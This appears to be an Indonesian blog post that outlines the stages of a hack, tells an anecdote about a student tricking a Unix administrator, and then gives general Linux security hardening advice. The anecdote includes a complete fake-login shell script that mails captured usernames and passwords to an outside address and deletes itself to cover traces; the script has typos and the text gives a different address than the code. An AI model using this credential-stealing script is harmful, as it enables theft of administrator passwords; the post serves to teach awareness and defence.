MEMAHAMI HACKER BEKERJA
Nah secara umum ni memahami hacker bekerja melalui tahapan-tahapan sebagai berikut :
1. Tahap mencari tahu system komputer sasaran.
2. Tahap penyusupan
3. Tahap penjelajahan
4. Tahap keluar dan menghilangkan jejak.
Ini ada Contoh kasus Trojan House, memanfaatkan SHELL script
UNIX :
Ada Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan
tinggi memiliki potensi memancing pengelola sistem komputer (administrator
pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer
tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan.
Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin
menunjukkan kekuasaan sebagai administrator UNIX. "Well, ini soal kecil. Mungkin password loe ke blokir, biar gue perbaiki dari tempat loe", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hikhikhikhik.........
Nah What happened ?
Sederhana lho,,, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda
trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER"
–ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN :
$PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login
Incorrect"
done
rm $0
kill –9 $PPID
Apabila program ini dijalankan maka akan
ditampilkan layar login seperti layaknya awal penggunaan komputer pada sistem UNIX:
Login:
Password:
Lihat,,,
Administrator UNIX yang gagah perkasa
tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak
sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda
dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan meminta
pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka
segera timbul pesan
Login:root
Password:
********
Login Incorrect
So pasti Administrator UNIX akan kaget
bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi
login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka
loginnya dibatalkan dan kembali keluar UNIX.
Coba perhatikan program di atas baik-baik, sekali pemakai
tersebut mencoba login dan mengisi password pada layar di atas, setelah itu
maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini
maka si gadis lugu dan genit telah mendapatkan login dan password . . .
What
!!!!!!!???? ia ternyata
seorang hacker !!????
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program
ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak
(masih ingat tahapan hacker yang ditulis di atas?). Proses ini dilakukan pada 2
baris terakhir dari program my_login di atas, yaitu
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses
penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian
hilanglah program tersebut yang tentunya juga menhilangkan barang bukti.
Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . .
So hilang lah sudah tanda-tanda bahwa hacker nya ternyata
seorang gadis peserta kuliahnya.
Sukses dari program ini sebenarnya sangat tergantung dari bagaimana
agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus
berusaha memancing agar pemilik root menjalankan program ini.
PRINSIP DASAR PERANCANGAN
SISTEM YANG AMAN
1. Mencegah hilangnya data
2. Mencegah masuknya penyusup
LAPISAN KEAMANAN :
1.
Lapisan Fisik :
·
membatasi akses
fisik ke mesin :
o
Akses masuk ke
ruangan komputer
o
penguncian
komputer secara hardware
o
keamanan BIOS
o
keamanan
Bootloader
·
back-up data :
o
pemilihan
piranti back-up
o
penjadwalan
back-up
·
mendeteksi
gangguan fisik :
·
log file : Log
pendek atau tidak lengkap, Log yang berisikan waktu yang aneh, Log dengan
permisi atau kepemilikan yang tidak tepat, Catatan pelayanan reboot atau
restart, Log yang hilang, masukan su atau login dari tempat yang janggal
·
mengontrol
akses sumber daya.
2.
Keamanan lokal
Ini berkaitan dengan user dan
hak-haknya :
·
Beri mereka fasilitas minimal yang diperlukan.
·
Hati-hati terhadap saat/dari mana mereka login, atau
tempat seharusnya mereka login.
·
Pastikan dan hapus rekening mereka ketika mereka tidak
lagi membutuhkan akses.
3.
Keamanan Root
·
Ketika melakukan perintah yang kompleks, cobalah dalam
cara yang tidak merusak dulu, terutama perintah yang menggunakan globbing:
contoh, sobat
ingin melakukan "rm foo*.bak", pertama coba dulu: "ls
foo*.bak" dan pastikan anda ingin menghapus file-file yang sobat pikirkan.
·
Beberapa orang merasa terbantu ketika melakukan
"touch /-i" pada sistem mereka. Hal ini akan membuat
perintah-perintah seperti : "rm -fr *" menanyakan apakah sobat benar-benar ingin menghapus seluruh file.
(Shell sobat menguraikan "-i" dulu, dan
memberlakukannya sebagai option -i ke rm).
·
Hanya menjadi root ketika melakukan tugas tunggal
tertentu. Jika sobat berusaha mengetahui bagaimana melakukan sesuatu, kembali
ke shell pemakai normal hingga sobat yakin apa
yang perlu dilakukan oleh root.
·
Jalur perintah untuk pemakai root sangat penting. Jalur
perintah, atau variabel lingkungan PATH mendefinisikan lokal yang dicari shell
untuk program. Cobalah dan batasi jalur perintah bagi pemakai root sedapat
mungkin, dan jangan pernah menggunakan '.', yang berarti 'direktori saat ini',
dalam pernyataan PATH kamu sobat. Sebagai tambahan, jangan pernah menaruh
direktori yang dapat ditulis pada jalur pencarian sobat, karena hal ini
memungkinkan penyerang memodifikasi atau menaruh file biner dalam jalur
pencarian sobat,
yang memungkinkan mereka menjadi root ketika sobat menjalankan perintah tersebut.
·
Jangan pernah menggunakan seperangkat utilitas rlogin/rsh/rexec
(disebut utilitasr) sebagai root. Mereka menjadi sasaran banyak
serangan, dan sangat berbahaya bila dijalankan sebagai root. Jangan membuat
file .rhosts untuk root.
·
File /etc/securetty berisikan daftar terminal-terminal
tempat root dapat login. Secara baku (pada RedHat Linux) diset hanya pada
konsol virtual lokal (vty). Berhati-hatilah saat menambahkan yang lain ke file ini. Sobat seharusnya login dari jarak jauh sebagai
pemakai biasa dan kemudian 'su' jika sobat butuh (mudah-mudahan melalui ssh
atau saluran terenkripsi lain), sehingga tidak perlu untuk login secara
langsung sebagai root.
·
Selalu perlahan dan berhati-hati ketika menjadi root.
Tindakan kamu
dapat mempengaruhi banyak hal. Pikir sebelum kamu mengetik!
4.
Keamanan File dan system file
·
Directory
home user tidak boleh mengakses perintah mengubah system seperti partisi,
perubahan device dan lain-lain.
·
Lakukan
setting limit system file.
·
Atur
akses dan permission file : read, writa, execute bagi user maupun group.
·
Selalu
cek program-program yang tidak dikenal
5.
Keamanan Password dan
Enkripsi
·
Hati-hati
terhadap bruto force attack dengan membuat password yang baik.
·
Selalu
mengenkripsi file yang dipertukarkan.
·
Lakukan
pengamanan pada level tampilan, seperti screen saver.
6.
Keamanan Kernel
·
selalu
update kernel system operasi.
·
Ikuti
review bugs dan kekurang-kekurangan pada system operasi.
7.
Keamanan Jaringan
·
Waspadai
paket sniffer yang sering menyadap port Ethernet.
·
Lakukan
prosedur untuk mengecek integritas data
·
Verifikasi
informasi DNS
·
Lindungi
network file system
·
Gunakan
firewall untuk barrier antara jaringan privat dengan jaringan eksternal
Tidak ada komentar:
Posting Komentar